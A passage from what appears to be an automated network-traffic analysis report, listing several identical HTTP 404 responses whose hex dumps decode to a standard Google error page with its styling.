65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:11:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
